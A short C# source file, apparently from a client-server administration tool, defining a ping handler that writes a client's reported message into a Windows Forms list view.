2019-09-02 08:02:35 +03:00

25 lines
660 B
C#

using Server.MessagePack;
using Server.Connection;
using System.Diagnostics;
using System.Windows.Forms;
namespace Server.Handle_Packet
{
public class HandlePing
{
public HandlePing(Clients client, MsgPack unpack_msgpack)
{
try
{
lock (Settings.LockListviewClients)
if (client.LV != null)
client.LV.SubItems[Program.form1.lv_prefor.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString;
else
Debug.WriteLine("Temp socket pinged server");
}
catch { }
}
}
}